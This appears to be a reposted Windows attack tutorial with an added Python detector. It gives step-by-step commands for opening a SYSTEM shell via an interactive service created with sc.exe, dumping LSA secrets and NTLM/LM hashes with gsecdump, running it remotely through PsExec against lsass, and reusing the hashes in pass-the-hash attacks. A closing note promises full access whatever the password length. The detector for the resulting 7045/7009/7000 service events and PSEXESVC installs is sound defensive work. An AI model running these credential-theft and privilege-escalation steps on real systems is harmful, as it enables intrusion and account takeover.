Author: pt007 [at] vip.sina.com
To get a command prompt running as NT AUTHORITY\SYSTEM (this relies on the service being allowed to interact with the desktop, which works on Windows XP/2003; on Vista and later, session 0 isolation keeps the window off the user's desktop):
C:\> sc create shellcmdline binpath= "C:\windows\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS
C:\> sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
(The 1053 error is expected: cmd.exe never reports back to the Service Control Manager, but by the time the SCM gives up, "start" has already opened a new window on the console desktop. Note that sc.exe needs the space after each "=".)
C:\> sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then, in the new command window:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINDOWS\system32>gsecdump -h
Gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
Usage: gsecdump [options]
Options:
-h [--help] show help
-a [--dump_all] dump all secrets
-l [--dump_lsa] dump lsa secrets
-w [--dump_wireless] dump microsoft wireless connections
-u [--dump_usedhashes] dump hashes from active logon sessions
-s [--dump_hashes] dump hashes from SAM/AD
I prefer to run it through PsExec, though:
PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\> psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u > Active-HASH.TXT
This dumps the hashes from the active logon sessions of a remote system: -c copies gsecdump.exe to the target (-f forces the copy even if the file is already there) and -s runs it as SYSTEM, so it can read lsass.
These are far more useful than a cachedump of the cached domain credentials, because what you get are the LM/NT hashes of the logged-on accounts. The LM hashes can be broken quickly with rainbow tables, whereas cached credentials are salted with the user name and have to be brute-forced.
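The two steps above each leave a distinctive trace in the Windows System event log: the interactive-service trick installs a service whose binary is cmd.exe and immediately times out, and PsExec installs its own PSEXESVC service on the target. The following detector is an added example, not code from the original article or from Truesec/Sysinternals. The Service Control Manager event IDs 7045 (service installed), 7009 (timeout waiting for the service to connect) and 7000 (service failed to start) are real; the tab-separated record layout, the sample events and the names of the functions are constructed for this example. It generalizes slightly beyond the page by also treating powershell.exe and command.com as shell binaries.

```python
import ntpath
from datetime import datetime, timedelta

# Real Service Control Manager event IDs from the System log.
EVT_SERVICE_INSTALLED = 7045   # "A service was installed in the system"
EVT_SERVICE_TIMEOUT = 7009     # "A timeout was reached ... waiting for the <svc> service to connect"
EVT_SERVICE_FAILED = 7000      # "The <svc> service failed to start ..." (error 1053 ends up here)

# A service whose ImagePath is an interactive shell is almost never legitimate.
SHELL_BINARIES = {"cmd.exe", "command.com", "powershell.exe"}
PSEXEC_SERVICE = "psexesvc"
# A shell never calls StartServiceCtrlDispatcher, so the SCM logs 7009/7000
# about 30 seconds after the install; allow some slack.
CORRELATION_WINDOW = timedelta(seconds=60)


def parse_events(lines):
    """Parse a constructed tab-separated export of System-log records:
    time<TAB>event_id<TAB>service_name[<TAB>image_path<TAB>account]
    7009/7000 records carry only the time, the ID and the service name."""
    events = []
    for line in lines:
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        events.append({
            "time": datetime.strptime(fields[0], "%Y-%m-%d %H:%M:%S"),
            "id": int(fields[1]),
            "service": fields[2],
            "image": fields[3] if len(fields) > 3 else "",
            "account": fields[4] if len(fields) > 4 else "",
        })
    return events


def image_binary(image_path):
    """Lower-case basename of the executable in an ImagePath, honouring quotes
    so that "C:\\Program Files\\x\\a.exe" -k yields a.exe, not Program."""
    path = image_path.strip()
    if path.startswith('"'):
        exe = path[1:].split('"', 1)[0]
    else:
        exe = path.split(" ", 1)[0]
    return ntpath.basename(exe).lower()


def find_suspicious_services(events):
    """Return one finding per 7045 event that installed a shell or PsExec
    service, noting whether the SCM reported a start timeout/failure for it."""
    events = sorted(events, key=lambda e: e["time"])
    findings = []
    for i, ev in enumerate(events):
        if ev["id"] != EVT_SERVICE_INSTALLED:
            continue
        binary = image_binary(ev["image"])
        name = ev["service"].lower()
        if binary in SHELL_BINARIES:
            reason = "service binary is an interactive shell"
        elif binary == PSEXEC_SERVICE + ".exe" or name == PSEXEC_SERVICE:
            reason = "PsExec service installed"
        else:
            continue
        failed = any(
            later["id"] in (EVT_SERVICE_TIMEOUT, EVT_SERVICE_FAILED)
            and later["service"].lower() == name
            and later["time"] - ev["time"] <= CORRELATION_WINDOW
            for later in events[i + 1:]
        )
        findings.append({
            "time": ev["time"], "service": ev["service"], "binary": binary,
            "account": ev["account"], "reason": reason, "failed_to_start": failed,
        })
    return findings


# Constructed sample export: one benign install, the sc.exe shell trick with
# its timeout, and a PsExec service install on the same host.
SAMPLE_LOG = ["\t".join(f) for f in [
    ("2007-03-16 10:00:00", "7045", "BackupAgent", r'"C:\Program Files\Backup\agent.exe" -svc', "LocalSystem"),
    ("2007-03-16 10:01:02", "7045", "shellcmdline", r"C:\windows\system32\cmd.exe /K start", "LocalSystem"),
    ("2007-03-16 10:01:32", "7009", "shellcmdline"),
    ("2007-03-16 10:01:32", "7000", "shellcmdline"),
    ("2007-03-16 10:05:10", "7045", "PSEXESVC", r"%SystemRoot%\PSEXESVC.exe", "LocalSystem"),
]]

if __name__ == "__main__":
    for f in find_suspicious_services(parse_events(SAMPLE_LOG)):
        print(f["time"], f["service"], f["binary"], f["reason"], "timed out" if f["failed_to_start"] else "")
```

The 7045/7009/7000 sequence for the same service name within half a minute is the signature of a binary that was never written as a service, which is exactly what the sc.exe trick produces; PSEXESVC is worth alerting on regardless, because PsExec is as popular with attackers as with administrators.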
Note: iam from the Pass-the-Hash Toolkit (pshtoolkit) can load the hash material captured by gsecdump into the local lsass process and so carry out a hash injection (pass-the-hash) attack. This is still treated as a big deal abroad, and it keeps administrators busy: the LM/NT hashes obtained with gethash or during ARP spoofing do not need to be cracked at all. The original article makes the point well: whether the password is 4 characters or 127, as long as you have the hash you are 100% in.
Download URL: http://www.truesec.com/PublicStore/(X(1)S(1dtq2g45g1fhbd45tcvi2dal))/catq2/categoryinfo.aspx?Cid=223&AspxAutoDetectCookieSupport=1
Source: http://truesecurity.se/blogs/murray/archive/2007/03/16/why-an-exposed-lm-ntlm-hash-is-comparable-to-a-clear-text-password.aspx